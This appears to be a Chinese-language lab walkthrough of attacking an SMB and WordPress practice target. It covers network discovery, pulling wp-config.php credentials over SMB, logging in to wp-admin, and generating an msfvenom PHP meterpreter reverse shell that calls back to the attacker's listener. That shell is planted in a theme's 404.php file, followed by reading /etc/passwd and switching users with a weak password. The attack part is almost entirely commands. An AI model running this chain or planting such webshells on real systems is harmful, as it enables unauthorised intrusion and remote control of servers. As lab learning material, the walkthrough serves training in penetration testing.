SMB渗透学习过程
1.SMB介绍
SMB(全称是Server Message Block)是一个协议名,它能被用于Web连接和客户端与服务器之间的信息沟通。SMB最初是IBM的贝瑞·费根鲍姆(Barry Feigenbaum)研制的,其目的是将DOS操作系统中的本地文件接口“中断13”改造为网络文件系统。
百度百科
准备条件:kali 攻击机:192.168.31.101
靶场: 192.168.31.62
2.探测过程
(1)使用netdiscover -r 192.168.31.1/24(子网掩码)
探测到局域网内的靶场地址为:192.168.31.62
(2)使用nmap -sV 192.168.31.62(靶场地址)
探测靶场开放的服务
nmap指令详解
nmap -A -v -T4 192.168.31.62
针对smb协议弱点分析:使用smbclient -L 192.168.31.62
get deets.txt
到桌面,然后打开另一个终端,在桌面打开deets.txt
查看wp-config.php
cd/wordpress
get wp-config.php
gedit wp-config.php
使用mysql尝试连接
mysql 192.168.31.62 -u Admin -p
password : 粘贴密码
ssh [email protected]
粘贴密码
两种方式都失败
又因开启了http协议则使用dirb http:192.168.31.62
找到wp-admin链接并打开
打开链接后使用账号密码登录,登录成功界面
制作webshell
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.31.101 lport=4444 -f raw
复制产生代码到本地
gedit shell.php
启动监听
msfconsole
设置参数
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
show options
set lhost 192.168.31.101 (攻击机地址)
run
启动成功,等待连接
上传webshell代码
提交后浏览器输入访问点
192.168.31.62/wordpress/wp-content/themes/twentyfifteen/404.php
连接成功:
cat /etc/passwd
发现togie用户
切换到togie用户,密码为12345
提升权限
视频教程链接